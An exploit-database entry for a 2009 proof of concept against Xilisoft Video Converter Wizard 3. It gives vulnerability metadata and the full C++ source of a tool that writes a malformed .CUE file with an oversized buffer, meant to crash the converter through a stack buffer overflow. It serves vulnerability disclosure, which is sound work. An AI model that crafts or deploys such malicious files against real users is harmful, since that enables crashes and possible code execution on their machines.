Xilisoft Video Converter Wizard 3 .CUE File Stack Buffer Overflow POC

vendor:

Xilisoft Video Converter Wizard

by:

fl0 fl0w

7.8

CVSS

HIGH

Stack Buffer Overflow

119

CWE

Product Name: Xilisoft Video Converter Wizard

Affected Version From: 3

Affected Version To: 3

Patch Exists: YES

Related CWE: N/A

CPE: a:xilisoft:xilisoft_video_converter_wizard

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

Xilisoft Video Converter Wizard 3 .CUE File Stack Buffer Overflow POC

Xilisoft Video Converter Wizard 3 is vulnerable to a stack buffer overflow vulnerability when processing a specially crafted .CUE file. An attacker can exploit this vulnerability by creating a malicious .CUE file and convincing a user to open it, resulting in arbitrary code execution.

Mitigation:

Update to the latest version of Xilisoft Video Converter Wizard 3.

Source

Exploit-DB raw data:

/*
----------------------------------------------------------------------------------------
Xilisoft Video Converter Wizard 3 .CUE File Stack Buffer Overflow POC

name: xilisoft.cpp

Credits : fl0 fl0w
----------------------------------------------------------------------------------------
ScreanShot in the debugger

Link: http://www.downloadatoz.com/xilisoft-video-converter/wizard.html

http://img23.imageshack.us/my.php?image=xilisoftvideoconverter.jpg
----------------------------------------------------------------------------------------
*/

//Start

#include <stdio.h>
#include <string.h>
#include <stdio.h>
#include <assert.h>
#include <windows.h>

#define     SIZE 100000

#define     FILE_FF " BINARY.. TRACK 01 MODE2/2352.. INDEX 01 00:00:00.."  

class EXPLOIT {
	public:
	
int check (char *, char *);
void Usage (char *);
 };
 
static int  Poz = 1;
static int  Neg = 0;
  
int i;      

char Name [SIZE];    
char NeWbuff [SIZE];
                                            

                                                  int main (int argc, char *argv [])                                                                                           

 { 
         
        EXPLOIT VIDEO;
        
             
             if ( argc < 2) 
             
                VIDEO.Usage ( argv [0]); 
       
                                                  if ( VIDEO.check ( argv [1], "-file") == Neg) { 
                                                   
                                                       fprintf ( stdout , " Incorect input "); 
                                                       
                                                       printf ( " \t..Usage is %s -file filename.. \n", Name);
                                                                                                                              
                                                               exit ( 0);
                                                            
                                                            }
                                               
                                                                                 
        
        
          do {
        
            NeWbuff [i] = 'A';
         
            i++;
               
            }while (i < 500);
               
       
        
        FILE *f;
        
        strcpy (Name, argv [2]);
        
        strcat (Name, " .cue ");
        
        f = fopen (Name, "w");
        
        assert ( f != NULL);
        
        
        
        
        strncpy ( NeWbuff + 500 , FILE_FF , strlen ( FILE_FF)); 
                                                                 
          
        
        fputs("FILE \"", f);
        
        fprintf ( f, " %s ", NeWbuff);
               
                
        fprintf ( stdout , "File build ! ");
         
        exit ( 0);  
         
       getchar ();
       
                                                   return 0;        
                                                  }
                                                                                                    

                                                         
  
                                                  int EXPLOIT::check (char *Arg_, char *_Arg)
   
   {
        
       if ( strcmp ( Arg_, _Arg) == 0)
       
        return Poz;
        
      return Neg;
        
        }   
        
    void EXPLOIT::Usage (char *Name)
    
   {
     system ("cls");    
     fprintf ( stdout , " \n..Xilisoft Video Converter Wizard 3 .CUE File Stack Buffer Overflow POC..\n ");
     printf ( " \t..Usage is %s -file filename.. \n", Name);    
     fprintf ( stdout , "..All Credits fl0 fl0w.. \n");
     
     
         }   
         
        
//EOF           

// milw0rm.com [2009-04-10]